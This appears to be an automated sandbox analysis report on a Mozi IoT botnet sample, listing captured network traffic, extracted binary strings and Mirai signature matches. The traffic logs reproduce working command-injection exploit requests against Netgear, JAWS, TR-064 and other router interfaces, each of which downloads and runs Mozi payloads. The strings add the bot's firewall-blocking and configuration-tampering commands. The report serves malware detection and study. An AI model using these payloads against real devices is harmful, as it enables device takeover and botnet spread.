                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 96.190.191.68:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://192.168.1.1:8088/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.Data Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 159.166.66.226:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 32.113.47.182:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 89.176.240.190:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                            Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                            Source: global trafficDNS traffic detected: DNS query: dht.transmissionbt.com
                            Source: global trafficDNS traffic detected: DNS query: router.bittorrent.com
                            Source: global trafficDNS traffic detected: DNS query: router.utorrent.com
                            Source: global trafficDNS traffic detected: DNS query: bttracker.debian.org
                            Source: unknownHTTP traffic detected: POST /UD/act?1 HTTP/1.1Host: 127.0.0.1:7574User-Agent: Hello, worldSOAPAction: urn:dslforum-org:service:Time:1#SetNTPServersContent-Type: text/xmlContent-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 3f 3e 3c 53 4f 41 50 2d 45 4e 56 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 4f 41 50 2d 45 4e 56 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 53 4f 41 50 2d 45 4e 56 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 53 4f 41 50 2d 45 4e 56 3a 42 6f 64 79 3e 3c 75 3a 53 65 74 4e 54 50 53 65 72 76 65 72 73 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 64 73 6c 66 6f 72 75 6d 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 54 69 6d 65 3a 31 26 71 75 20 6f 74 3b 3e 3c 4e 65 77 4e 54 50 53 65 72 76 65 72 31 3e 60 63 64 20 2f 74 6d 70 20 26 26 20 72 6d 20 2d 72 66 20 2a 20 26 26 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 20 26 26 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 74 72 30 36 34 20 26 26 20 2f 74 6d 70 2f 74 72 30 36 34 20 74 72 30 36 34 60 3c 2f 4e 65 77 4e 54 50 53 65 72 76 65 72 31 3e 3c 4e 65 77 4e 54 50 53 65 72 76 65 72 32 3e 60 65 63 68 6f 20 44 45 41 54 48 60 3c 2f 4e 65 77 4e 54 50 53 65 72 76 65 72 32 3e 3c 4e 65 77 4e 54 50 53 65 72 76 65 72 33 3e 60 65 63 68 6f 20 44 45 41 54 48 60 3c 2f 4e 65 77 4e 54 50 53 65 72 76 65 72 33 3e 3c 4e 65 77 4e 54 50 53 65 72 76 65 72 34 3e 60 65 63 68 6f 20 44 45 41 54 48 60 3c 2f 4e 65 77 4e 54 50 53 65 72 76 65 72 34 3e 3c 4e 65 77 4e 54 50 53 65 72 76 65 72 35 3e 60 65 63 68 6f 20 44 45 41 54 48 60 3c 2f 4e 65 77 4e 54 50 53 65 72 76 65 72 35 3e 3c 2f 75 3a 53 65 74 4e 54 50 53 65 72 76 65 72 73 3e 3c 2f 53 4f 41 50 2d 45 4e 56 3a 42 6f 64 79 3e 3c 2f 53 4f 41 50 2d 45 4e 56 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1&qu ot;><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/tr064 && /tmp/tr064 tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 10 Dec 2024 23:42:57 GMTServer: Apache/2.4.58 ()Content-Length: 196Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 10 Dec 2024 23:43:08 GMTServer: Apache/2.4.62 (Debian)Content-Length: 280Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 36 32 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 32 37 35 30 34 34 2e 6d 65 6c 62 69 2e 73 70 61 63 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.62 (Debian) Server at 275044.melbi.space Port 80</address></body></html>
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 10 Dec 2024 23:44:18 GMTContent-Type: text/html; charset=utf-8Content-Length: 146Connection: closeX-Frame-Options: SAMEORIGINData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 10 Dec 2024 23:44:19 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Tue, 10 Dec 2024 23:44:38 GMTContent-Type: text/htmlContent-Length: 150Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty</center></body></html>
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 10 Dec 2024 23:44:45 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 10 Dec 2024 23:45:49 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveContent-Encoding: gzipData Raw: 36 62 0d 0a 1f 8b 08 00 00 00 00 00 04 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a 48 54 54 50 2f 31 2e 31 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 54 75 65 2c 20 31 30 20 44 65 63 20 32 30 32 34 20 32 33 3a 34 35 3a 34 39 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 35 30 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: 6b(HML),I310Q/Qp/K&T$dCAfAyyyr0.a30HTTP/1.1 400 Bad RequestServer: nginxDate: Tue, 10 Dec 2024 23:45:49 GMTContent-Type: text/htmlContent-Length: 150Connection: close<html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 10 Dec 2024 23:46:14 GMTServer: ApacheAccept-Ranges: bytesContent-Length: 955Keep-Alive: timeout=5, max=100Connection: Keep-AliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 63 73 73 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 46 65 68 6c 65 72 20 34 30 34 20 2d 20 53 65 69 74 65 20 6e 69 63 68 74 20 67 65 66 75 6e 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 22 2f 6d 69 74 74 77 61 6c 64 5f 73 79 73 74 65 6d 5f 70 61 67 65 73 2f 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 3e 20 20 20 0a 09 09 3c 21 2d 2d 5b 69 66 20 6c 74 65 20 49 45 20 36 5d 3e 0a 09 09 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 09 09 64 69 76 2c 20 69 6d 67 7b 20 62 65 68 61 76 69 6f 72 3a 75 72 6c 28 2f 6d 69 74 74 77 61 6c 64 5f 73 79 73 74 65 6d 5f 70 61 67 65 73 2f 73 63 72 69 70 74 73 2f 69 65 70 6e 67 66 69 78 2e 68 74 63 29 20 7d 0a 09 09 09 3c 2f 73 74 79 6c 65 3e 0a 09 09 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 62 6f 78 22 3e 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 6f 62 65 6e 22 3e 3c 2f 64 69 76 3e 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 74 65 78 74 62 6f 78 22 3e 0a 09 09 09 09 3c 64 69 76 20 69 64 3d 22 74 65 78 74 62 6f 78 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 72 61 64 22 3e 26 6e 62 73 70 3b 3c 2f 73 70 61 6e 3e 20 20 0a 09 09 09 09 09 3c 68 31 3e 53 65 69 74 65 20 6e 69 63 68 74 20 67 65 66 75 6e 64 65 6e 3c 2f 68 31 3e 20 20 20 20 20 20 20 20 20 20 20 0a 09 09 09 09 09 3c 70 3e 46 65 68 6c 65 72 20 34 30 34 20 2d 20 53 65 69 74 65 20 6e 69 63 68 74 20 67 65 66 75 6e 64 65 6e 3c 62 72 20 2f 3e 0a 09 09 09 09 09 09 44 69 65 20 61 6e 67 65 66 6f 72 64 65 72 74 65 20 53 65 69 74 65 20 65 78 69 73 74 69 65 72 74 20 6e 69 63 68 74 20 6f 64 65 72 20 73 74 65 68 74 20 74 65 6d 70 6f 72 c3 a4 72 20 6e 69 63 68 74 20 7a 75 72 20 56 65 72 66 c3 bc 67 75 6e 67 2e 3c 62 72 20 2f 3e 0a 09 09 09 09 09 09 42 69 74 74 65 20 76 65 72 73 75 63 68 65 6e 20 53 69 65 20 65 73 20 73 70 c3 a4 74 65 72 20 6e 6f 63 68 20 65 69 6e 6d 61 6c 20 6f 64 65 72 20 72 75 66 65 6e 20 53 69 65 20 64 69 65 20 53 74 61 72 74 73 65 69 74 65 20 64 65 72 20 67 65 77 c3 bc 6e 73 63 68 74 65 6e 20 44 6f 6d 61 69 6e 20 61 75 66 2e 3c 2f 70 3e 0a 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 69 64 3d 22 75 6e 74 65 6e 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 2f 64 69 76 3e 0a
                            Source: networks.14.drString found in binary or memory: http://%s:%d/Mozi.a;chmod
                            Source: Mozi.m.elf, networks.14.drString found in binary or memory: http://%s:%d/Mozi.a;sh$
                            Source: networks.14.drString found in binary or memory: http://%s:%d/Mozi.m
                            Source: Mozi.m.elf, networks.14.drString found in binary or memory: http://%s:%d/Mozi.m;
                            Source: Mozi.m.elf, networks.14.drString found in binary or memory: http://%s:%d/Mozi.m;$
                            Source: Mozi.m.elf, networks.14.drString found in binary or memory: http://%s:%d/Mozi.m;/tmp/Mozi.m
                            Source: networks.14.drString found in binary or memory: http://%s:%d/bin.sh
                            Source: Mozi.m.elf, networks.14.drString found in binary or memory: http://%s:%d/bin.sh;chmod
                            Source: networks.14.drString found in binary or memory: http://127.0.0.1
                            Source: Mozi.m.elf, networks.14.drString found in binary or memory: http://127.0.0.1sendcmd
                            Source: Mozi.m.elf, networks.14.drString found in binary or memory: http://HTTP/1.1
                            Source: Mozi.m.elf, networks.14.drString found in binary or memory: http://baidu.com/%s/%s/%d/%s/%s/%s/%s)
                            Source: kmod.sh.14.drString found in binary or memory: http://git.kernel.org/cgit/utils/kernel/kmod/kmod.git/commit/libkmod/libkmod-module.c?id=fd44a98ae2e
                            Source: .config.14.drString found in binary or memory: http://ia.51.la/go1?id=17675125&pu=http%3a%2f%2fv.baidu.com/
                            Source: networks.14.drString found in binary or memory: http://ipinfo.io/ip
                            Source: alsa-info.sh.14.drString found in binary or memory: http://pastebin.ca)
                            Source: alsa-info.sh.14.drString found in binary or memory: http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY
                            Source: alsa-info.sh.14.drString found in binary or memory: http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY&encrypt=t&encryptpw=blahblah
                            Source: Mozi.m.elf, networks.14.drString found in binary or memory: http://purenetworks.com/HNAP1/
                            Source: networks.14.drString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                            Source: networks.14.drString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                            Source: Mozi.m.elf, networks.14.drString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope//
                            Source: alsa-info.sh.14.drString found in binary or memory: http://www.alsa-project.org
                            Source: alsa-info.sh.14.drString found in binary or memory: http://www.alsa-project.org.
                            Source: alsa-info.sh.14.drString found in binary or memory: http://www.alsa-project.org/alsa-info.sh
                            Source: alsa-info.sh.14.drString found in binary or memory: http://www.alsa-project.org/cardinfo-db/
                            Source: alsa-info.sh.14.drString found in binary or memory: http://www.pastebin.ca
                            Source: alsa-info.sh.14.drString found in binary or memory: http://www.pastebin.ca.
                            Source: alsa-info.sh.14.drString found in binary or memory: http://www.pastebin.ca/upload.php
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 33606
                            Source: unknownNetwork traffic detected: HTTP traffic on port 33606 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443
                            Source: /tmp/Mozi.m.elf (PID: 6230)HTML file containing JavaScript created: /usr/networksJump to dropped file

                            System Summary

                            barindex
                            Source: Mozi.m.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_5c62e6b2 Author: unknown
                            Source: Mozi.m.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_77137320 Author: unknown
                            Source: Mozi.m.elf, type: SAMPLEMatched rule: Linux_Trojan_Mirai_ac253e4f Author: unknown
                            Source: 6226.1.00007fd22c017000.00007fd22c058000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5c62e6b2 Author: unknown
                            Source: 6226.1.00007fd22c017000.00007fd22c058000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_77137320 Author: unknown
                            Source: 6226.1.00007fd22c017000.00007fd22c058000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_ac253e4f Author: unknown
                            Source: 6228.1.00007fd22c017000.00007fd22c058000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_5c62e6b2 Author: unknown
                            Source: 6228.1.00007fd22c017000.00007fd22c058000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_77137320 Author: unknown
                            Source: 6228.1.00007fd22c017000.00007fd22c058000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_ac253e4f Author: unknown
                            Source: /usr/networks, type: DROPPEDMatched rule: Linux_Trojan_Mirai_5c62e6b2 Author: unknown
                            Source: /usr/networks, type: DROPPEDMatched rule: Linux_Trojan_Mirai_77137320 Author: unknown
                            Source: /usr/networks, type: DROPPEDMatched rule: Linux_Trojan_Mirai_ac253e4f Author: unknown
                            Source: Initial sampleString containing 'busybox' found: busybox
                            Source: Initial sampleString containing 'busybox' found: ..%s/%s/proc/haha/tmp/var/lib/dev/syscfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL "http://127.0.0.1"cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword "acsMozi"iptables -I INPUT -p tcp --destination-port 35000 -j DROPiptables -I INPUT -p tcp --destination-port 50023 -j DROPiptables -I OUTPUT -p tcp --source-port 50023 -j DROPiptables -I OUTPUT -p tcp --source-port 35000 -j DROPiptables -I INPUT -p tcp --destination-port 7547 -j DROPiptables -I OUTPUT -p tcp --source-port 7547 -j DROPiptables -I INPUT -p tcp --dport 35000 -j DROPiptables -I INPUT -p tcp --dport 50023 -j DROPiptables -I OUTPUT -p tcp --sport 50023 -j DROPiptables -I OUTPUT -p tcp --sport 35000 -j DROPiptables -I INPUT -p tcp --dport 7547 -j DROPiptables -I OUTPUT -p tcp --sport 7547 -j DROP/mnt/jffs2/Equip.sh%s%s%s%s#!/bin/sh/mnt/jffs2/wifi.sh/mnt/jffs2/WifiPerformance.shbusybox%255s %255s %255s %255s
